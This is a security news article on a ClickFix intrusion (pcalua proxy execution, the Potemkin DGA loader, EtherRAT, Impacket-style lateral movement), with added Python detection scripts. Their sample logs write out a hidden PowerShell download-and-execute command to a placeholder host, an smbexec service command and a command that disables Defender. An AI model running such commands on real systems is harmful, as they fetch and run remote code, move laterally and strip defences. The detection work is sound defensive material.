Hackers Exploit ClickFix to Deploy MSI Packages and Launch Attacks

Cybersecurity researchers have uncovered an intrusion that used the ClickFix social engineering technique to gain a foothold in an organization's network. ClickFix tricks users into running attacker-supplied commands themselves under the guise of a routine troubleshooting step, so no software exploit is needed; in this case the command installed an MSI package that opened the door to hands-on-keyboard activity.

A ClickFix lure (typically a fake CAPTCHA, browser error or "fix this" pop-up) instructs the user to press Windows key + R, paste a command into the Run dialog, and press Enter; the command has usually already been placed on the clipboard by the page's script. The sequence looks like routine troubleshooting, but it makes the victim launch the first stage personally, from explorer.exe and with their own privileges, which sidesteps download and attachment controls that never see the command.

In a recent incident analyzed by Huntress in May 2026, the attacker used ClickFix to gain initial access to an organization's network. A user visited a compromised website and followed the instructions it displayed. The pasted command ran pcalua.exe, the Program Compatibility Assistant launcher: a signed Microsoft binary whose -a switch starts an arbitrary program, which is why it is abused as an execution proxy. Through it, a remote script was silently fetched and run, and that script downloaded and installed an MSI package in the background with nothing visible to the user.
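To make the initial-access step concrete, here is an added detection example, written for this page rather than taken from Huntress or from the malware: it scores process-creation records for explorer.exe (the process that hosts the Run dialog) spawning a script interpreter or pcalua.exe with a remote URL or a hidden/encoded launch switch on the command line. The tab-separated record format, the example.invalid URLs, the list of suspect child binaries and the two-indicator threshold are all assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Binaries a ClickFix lure typically hands to the Run dialog. pcalua.exe is the
# Program Compatibility Assistant launcher; "pcalua.exe -a <program>" runs any program.
SUSPECT_CHILDREN = {
    "pcalua.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "curl.exe", "certutil.exe", "msiexec.exe", "cscript.exe", "wscript.exe",
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Switches that hide or obscure the launch: hidden window, base64 encoded
# command, msiexec silent install from a URL, pcalua proxy execution.
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s*hidden|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|/i\s+https?://|\bpcalua(?:\.exe)?\s+-a\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list:
    """Return the indicators that make an event look like ClickFix ([] = benign)."""
    if basename(ev.parent_image) != "explorer.exe" or basename(ev.image) not in SUSPECT_CHILDREN:
        return []
    reasons = [f"explorer.exe spawned {basename(ev.image)}"]
    if URL_RE.search(ev.command_line):
        reasons.append("command line references a remote URL")
    if EVASION_RE.search(ev.command_line):
        reasons.append("hidden, encoded or proxied launch switch present")
    # explorer.exe launching cmd.exe on its own is everyday admin activity;
    # require a second indicator before alerting.
    return reasons if len(reasons) >= 2 else []


def parse_record(line: str) -> ProcEvent:
    """Parse a tab-separated key=value process-creation record (a constructed
    format, not Sysmon's XML; command lines are assumed to contain no tabs)."""
    fields = dict(part.split("=", 1) for part in line.split("\t"))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def detect(lines):
    """Return [(command_line, reasons)] for every record that scores."""
    hits = []
    for line in lines:
        ev = parse_record(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev.command_line, reasons))
    return hits


def rec(parent, image, cmdline):
    return "\t".join([f"ParentImage={parent}", f"Image={image}", f"CommandLine={cmdline}"])


# Constructed sample records; example.invalid is a reserved, non-routable name.
SAMPLE_LOG = [
    rec(r"C:\Windows\explorer.exe", r"C:\Windows\System32\pcalua.exe",
        r'pcalua.exe -a powershell.exe -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"'),
    rec(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe notes.txt"),
    rec(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c ipconfig /all"),
    rec(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\curl.exe",
        r"curl.exe https://example.invalid/update.zip -o update.zip"),
    rec(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
        r"mshta.exe https://example.invalid/verify.hta"),
]

if __name__ == "__main__":
    for cmd, why in detect(SAMPLE_LOG):
        print(cmd, "->", "; ".join(why))
```

The parent/child pairing is the durable signal: lures change their wording and their payload URL, but the Run dialog always hands the command to explorer.exe, so a rule keyed on that parent plus one corroborating indicator survives lure rotation.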

The MSI package dropped a custom loader named Potemkin into the user's AppData folder and added a registry autostart entry so that it survives reboots. Potemkin uses a Domain Generation Algorithm (DGA) to produce thousands of candidate domains and probes each until one answers from a live command-and-control server; from the defender's side this shows up as a burst of failed (NXDOMAIN) lookups for random-looking names from a single host, which is the most practical detection hook for a DGA. Once connected, it fetches and loads RMMProject, a 4.4 MB DLL that steals browser credentials, harvests cookies from multiple browsers, provides a hidden remote desktop module, and performs process injection.
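The NXDOMAIN burst described above can be caught without knowing the algorithm. The following added example (written for this page, not Potemkin's code or Huntress's detection content) reads constructed resolver log lines, counts distinct failed lookups per client inside a sliding window, and checks that the labels are high-entropy. The toy date-seeded generator used to build the sample traffic is a stand-in for a real DGA; the log format, client addresses, thresholds and window size are assumptions.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) client=(?P<client>\S+) "
    r"query=(?P<qname>\S+) rcode=(?P<rcode>\S+)$"
)


def registered_domain(qname: str) -> str:
    """Naive eTLD+1: the last two labels. Fine for .com/.net; a public-suffix
    list is needed to handle names such as example.co.uk correctly."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s: str) -> float:
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def detect_dga_bursts(lines, window=timedelta(minutes=5), min_unique=20, min_entropy=2.5):
    """Return {client: (distinct NXDOMAIN names in the busiest window, mean label
    entropy)} for every client that exceeds both thresholds."""
    per_client = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["rcode"] != "NXDOMAIN":
            continue  # only failed lookups count; a resolved name is not a probe
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        per_client[m["client"]].append((ts, registered_domain(m["qname"])))
    hits = {}
    for client, events in per_client.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):  # sliding window over time-sorted events
            while events[end][0] - events[start][0] > window:
                start += 1
            names = {name for _, name in events[start:end + 1]}
            if len(names) > len(best):
                best = names
        if len(best) < min_unique:
            continue
        mean_entropy = sum(shannon_entropy(n.split(".")[0]) for n in best) / len(best)
        if mean_entropy >= min_entropy:
            hits[client] = (len(best), round(mean_entropy, 2))
    return hits


def toy_dga(seed: str, count: int, length: int = 12):
    """Illustrative date-seeded DGA (an assumption, not Potemkin's algorithm):
    SHA-256 of seed+index, first bytes mapped onto letters, TLD from the last byte."""
    tlds = ("com", "net", "org")
    for i in range(count):
        digest = hashlib.sha256(f"{seed}-{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:length])
        yield f"{label}.{tlds[digest[-1] % 3]}"


def build_sample_log():
    """Constructed resolver log: one host probes 30 generated names in 30 seconds
    (plus one successful lookup), another host makes a few ordinary typos over a morning."""
    lines = [f"2026-05-12 09:00:{i:02d} client=10.0.0.5 query={d}. rcode=NXDOMAIN"
             for i, d in enumerate(toy_dga("2026-05-12", 30))]
    lines.append("2026-05-12 09:00:30 client=10.0.0.5 query=example.com. rcode=NOERROR")
    for h, typo in enumerate(["gooogle.com", "faceboook.com", "githb.com", "outlok.com", "wikipdia.org"]):
        lines.append(f"2026-05-12 0{h + 3}:15:00 client=10.0.0.7 query={typo}. rcode=NXDOMAIN")
    return lines


SAMPLE_DNS_LOG = build_sample_log()

if __name__ == "__main__":
    print(detect_dga_bursts(SAMPLE_DNS_LOG))
```

Tune min_unique against a baseline of your own resolver logs: hosts running link checkers, mail servers doing reverse lookups and some CDN clients legitimately produce NXDOMAIN clusters, and the entropy check is what separates those (dictionary-like names) from algorithmically generated labels.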

At the same time, the attacker deployed EtherRAT, a Node.js-based backdoor that reads its command-and-control server address from the Ethereum blockchain. Because the address is read from a public, append-only ledger, there is no domain to seize and no hosting provider to serve a takedown on; blocking has to target the RPC endpoints the backdoor uses to read the chain. The intrusion escalated quickly: the attacker moved laterally with Impacket-style WMIExec and SMBExec (remote command execution over WMI, and over SMB by creating services), disabled Windows Defender, and compromised more than 11 systems before being detected.
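The lateral-movement tools named above leave characteristic artefacts in their default configuration. The following added example (written for this page, not Huntress's detection content) tags constructed process-creation and service-install events for wmiexec's output redirection to the ADMIN$ share on 127.0.0.1, smbexec's service binary path that writes execute.bat, and a Defender-disabling command, then orders the hits by host and time. The event schema, host names and timestamps are assumptions; the signatures are the tools' well-known defaults, which an attacker can change.

```python
import re

# wmiexec: WmiPrvSE.exe spawns cmd.exe whose output is redirected to a file named
# __<timestamp> on the ADMIN$ share of 127.0.0.1, so the operator can read it back over SMB.
WMIEXEC_OUTPUT_RE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d", re.IGNORECASE)
# smbexec: a service whose binary path echoes the command into execute.bat and
# sends its output to __output on a localhost share.
SMBEXEC_SERVICE_RE = re.compile(
    r"\\\\127\.0\.0\.1\\[A-Z]\$\\__output|%TEMP%\\execute\.bat", re.IGNORECASE)
# Any service whose binary is a shell rather than a real executable deserves a look.
SERVICE_SHELL_RE = re.compile(
    r'^\s*"?(?:%COMSPEC%|(?:.*\\)?(?:cmd|powershell)\.exe)(?=[\s"]|$)', re.IGNORECASE)
DEFENDER_TAMPER_RE = re.compile(
    r"Set-MpPreference\s+-Disable\w+|DisableAntiSpyware|DisableRealtimeMonitoring", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the tags that apply to one event; [] when nothing matches."""
    tags = []
    if event["type"] == "process":
        parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
        if parent == "wmiprvse.exe" and image in SHELLS:
            tags.append("shell spawned by WMI provider host")
        if WMIEXEC_OUTPUT_RE.search(cmd):
            tags.append("wmiexec-style output redirection to ADMIN$")
        if DEFENDER_TAMPER_RE.search(cmd):
            tags.append("Defender tampering")
    elif event["type"] == "service":
        path = event["image_path"]
        if SMBEXEC_SERVICE_RE.search(path):
            tags.append("smbexec-style service binary path")
        elif SERVICE_SHELL_RE.search(path):
            tags.append("service binary is a command shell")
    return tags


def timeline(events):
    """Tagged events ordered by host and time; the sequence (tamper with Defender,
    then execute on the next host) is what tells the lateral-movement story."""
    out = []
    for ev in sorted(events, key=lambda e: (e["host"], e["time"])):
        tags = classify(ev)
        if tags:
            out.append((ev["host"], ev["time"], tags))
    return out


# Constructed sample events (host names, times and command contents are invented).
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01", "time": "09:12:01",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1747900000.51 2>&1"},
    {"type": "process", "host": "WS01", "time": "09:12:40",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "service", "host": "WS02", "time": "09:20:05", "name": "BTOBTO",
     "image_path": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat "
                   r"& %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"type": "service", "host": "WS02", "time": "08:00:00", "name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"type": "process", "host": "WS03", "time": "09:30:00",
     "parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ipconfig"},
]

if __name__ == "__main__":
    for host, when, tags in timeline(SAMPLE_EVENTS):
        print(host, when, "; ".join(tags))
```

The Defender rule is deliberately broad: Set-MpPreference is also run by administrators, so in production pair it with the account and the source host, and treat it as high-severity only when it appears in the same window as the WMI or service artefacts.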

This incident underscores how far social engineering has come and why user vigilance alone is not a control. Security awareness training should cover the ClickFix pattern explicitly: no legitimate website or support flow asks you to paste a command into the Run dialog. Beyond training, organizations can remove the Run dialog where it is not needed (the Windows "Remove Run menu" policy, NoRun, also disables Windows key + R), alert on explorer.exe spawning script interpreters or execution proxies such as pcalua.exe, and review the RunMRU registry key, which records what users typed into the dialog. A capable endpoint detection and response deployment then catches the later stages, the DGA lookups, the service-based lateral movement and the Defender tampering, before a single pasted command turns into an 11-host incident.